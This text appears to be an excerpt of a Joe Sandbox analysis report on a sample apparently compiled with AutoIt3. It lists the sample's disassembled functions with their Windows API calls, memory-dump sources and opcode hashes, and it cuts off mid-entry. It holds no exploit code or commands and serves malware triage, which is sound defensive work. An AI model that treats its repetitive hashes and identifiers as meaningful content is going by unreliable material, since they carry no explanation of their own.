                                        • Instruction ID: 238caa0db0aa26c3ac00f18011a016a5a71d980b0e87ea3491fb7ceace73d799
                                        • Opcode Fuzzy Hash: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                                        • Instruction Fuzzy Hash: CA1146B5D0020DEFDB51CF99C8449EEFBB9FB08311F104166E914E3620D735AA559F50
                                        Function 00F0B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00F0B8FE
                                        • _memset.LIBCMT ref: 00F0B90D
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                                        • CloseHandle.KERNEL32 ref: 00F0B94E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3277943733-0
                                        • Opcode ID: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                                        • Instruction ID: 7b44dbe38d8cd852df88c63f64fd2c59d097946e1c2eb9a6b23c60136c2c9be6
                                        • Opcode Fuzzy Hash: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                                        • Instruction Fuzzy Hash: C3F089B55443087BF6203771AC45F7B7A9CEB1A774F001420BF08D5292D7755D08A7E8
                                        Function 00EE6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE6E88
                                          • Part of subcall function 00EE794E: _memset.LIBCMT ref: 00EE7983
                                        • _memmove.LIBCMT ref: 00EE6EAB
                                        • _memset.LIBCMT ref: 00EE6EB8
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE6EC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        • Opcode ID: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                                        • Instruction ID: 13d513b36a52386e37c3e503ff8f7b76f3aa8ae6011097de08bb33e607ce022b
                                        • Opcode Fuzzy Hash: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                                        • Instruction Fuzzy Hash: A2F0543A100204ABCF116F55DC85A49BB69EF49320F048061FE086E217C731E951DBB4
                                        Function 00F0C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                                          • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C030
                                        • LineTo.GDI32(00000000,?,?), ref: 00F0C03D
                                        • EndPath.GDI32(00000000), ref: 00F0C04D
                                        • StrokePath.GDI32(00000000), ref: 00F0C05B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                                        • Instruction ID: 01a9b11ef6dfb0652765e1215df6be5d6b7bcc10fb0a2a4171b3d20ac0e17389
                                        • Opcode Fuzzy Hash: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                                        • Instruction Fuzzy Hash: E9F0BE3100025DBBDB226F50AC09FCE3F98BF16320F048100FA11A14E287B50569FBD5
                                        Function 00EDA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                                        • GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                                        • AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                                        • Instruction ID: df4d992b058998bead3a4935919ac33da755fae2aa0277e6e848113bbeabfa7e
                                        • Opcode Fuzzy Hash: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                                        • Instruction Fuzzy Hash: FDE0A531545228BADB205FA2DC0DEDB7E5DFF167A1F048035B50995460CA72C645ABA1
                                        Function 00E82218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00E82231
                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8223B
                                        • SetBkMode.GDI32(?,00000001), ref: 00E82250
                                        • GetStockObject.GDI32(00000005), ref: 00E82258
                                        • GetWindowDC.USER32(?,00000000), ref: 00EBC0D3
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBC0E0
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00EBC0F9
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00EBC112
                                        • GetPixel.GDI32(00000000,?,?), ref: 00EBC132
                                        • ReleaseDC.USER32(?,00000000), ref: 00EBC13D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                                        • Instruction ID: ce205c6011112767ac53fbb6b79edf741db160163c5e9ac5e24471337ff254dc
                                        • Opcode Fuzzy Hash: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                                        • Instruction Fuzzy Hash: 03E06D32504248EBDB315FA8FC0D7D83B20FB05336F148366FA69A80E187714994EB12
                                        Function 00ED8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00ED8C63
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C6A
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ED882E), ref: 00ED8C77
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C7E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                                        • Instruction ID: ed63babdb02e4a3681a54b84725ddff2e23c0d1a06626631041781e23808257e
                                        • Opcode Fuzzy Hash: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                                        • Instruction Fuzzy Hash: 49E08636642215DBD7305FB06E0CB567BBCFF50796F054828B245D9040DA34844ADB71
                                        Function 00EC2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00EC2187
                                        • GetDC.USER32(00000000), ref: 00EC2191
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                                        • ReleaseDC.USER32(?), ref: 00EC21D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                                        • Instruction ID: 77c468a5847aaeae54e28ba67f2c7831720ffb6ed14101b0539867670df82430
                                        • Opcode Fuzzy Hash: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                                        • Instruction Fuzzy Hash: 3EE01A75800608EFDB51AFB0C808BAD7BF1FB4C350F108429F95AE7620CB3A9146AF40
                                        Function 00EC219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00EC219B
                                        • GetDC.USER32(00000000), ref: 00EC21A5
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                                        • ReleaseDC.USER32(?), ref: 00EC21D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                                        • Instruction ID: ef13efeadada6baa45df78f5037ded7438194431aa058971084bd85ec58c52ca
                                        • Opcode Fuzzy Hash: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                                        • Instruction Fuzzy Hash: 33E012B5800608AFCB61AFB0C8086AD7BF1FB4C310F108029F95EE7620CB3A9145AF40
                                        Function 00EDB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00EDB981
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        • Opcode ID: c0b3cce4802c99f588c0b12bdc03430cba81ba30b460f15f732438fab91c4d37
                                        • Instruction ID: a5dc764df59942174fab0c5500b03436b592ef83394607838a31d05da5307091
                                        • Opcode Fuzzy Hash: c0b3cce4802c99f588c0b12bdc03430cba81ba30b460f15f732438fab91c4d37
                                        • Instruction Fuzzy Hash: 86915A74600201DFDB24CF64C884A6ABBE8FF49710F15956EF94AEB791EBB0E841CB50
                                        Function 00EEB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • __wcsnicmp.LIBCMT ref: 00EEB298
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEB361
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        • Opcode ID: 1f3a34d51852c22414929d36ca67578eb6a709c74fec57113e86e3d75c32b8af
                                        • Instruction ID: 5d94b78c467286b09d90488521dff42df67e965493703c1244184d7ee8531830
                                        • Opcode Fuzzy Hash: 1f3a34d51852c22414929d36ca67578eb6a709c74fec57113e86e3d75c32b8af
                                        • Instruction Fuzzy Hash: 73617175E00219AFCB14EF95C882EAEB7F4EF48310F15506AF54ABB291DB70AE40CB51
                                        Function 00EC8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: Oa
                                        • API String ID: 4104443479-3945284152
                                        • Opcode ID: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                                        • Instruction ID: eb68414843b8b9b1964fb5aa2b2c337a8741862d1fca662cc880ec06e76ac8bc
                                        • Opcode Fuzzy Hash: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                                        • Instruction Fuzzy Hash: F45130B49006099FCF64CF68C680AAEB7F1FF44318F14552EE85AE7250EB31AD56CB51
                                        Function 00E92AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00E92AC8
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E92AE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                                        • Instruction ID: aeca2ee04c78effefe43b0801468c075133f254276cfb9b47bc47533760b8a0c
                                        • Opcode Fuzzy Hash: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                                        • Instruction Fuzzy Hash: 9E5158718187489BD320BF50D886BAFBBE8FF84314F56485DF1DD510A2DB709929CB16
                                        Function 00EE99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E8506B: __fread_nolock.LIBCMT ref: 00E85089
                                        • _wcscmp.LIBCMT ref: 00EE9AAE
                                        • _wcscmp.LIBCMT ref: 00EE9AC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
                                        • Instruction ID: 13c6d88903cd0a3b3a20490dfea66d37967d3eebb2eb2851191a8fd1f1cfd48a
                                        • Opcode Fuzzy Hash: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
                                        • Instruction Fuzzy Hash: C741D672A00649BADF20AAA5DC45FEFBBFDDF49714F00007AB904F7181DA75AA0487A1
                                        Function 00EF2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EF2892
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EF28C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: |
                                        • API String ID: 1413715105-2343686810
                                        • Opcode ID: 885ea0198366cd8ee9eb78a95842e60b5c250afc90aeb16e8674444b0bec1f32
                                        • Instruction ID: 83c06f81c5345cc9385d7bb75d29a101da5c6b5128b35e8e07c6310eb10c9c4a
                                        • Opcode Fuzzy Hash: 885ea0198366cd8ee9eb78a95842e60b5c250afc90aeb16e8674444b0bec1f32
                                        • Instruction Fuzzy Hash: 8B311971800119AFCF15AFA1CC85EEEBFB9FF08300F105069F959B6166DB319A56DBA0
                                        Function 00F06CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F06D86
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F06DC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
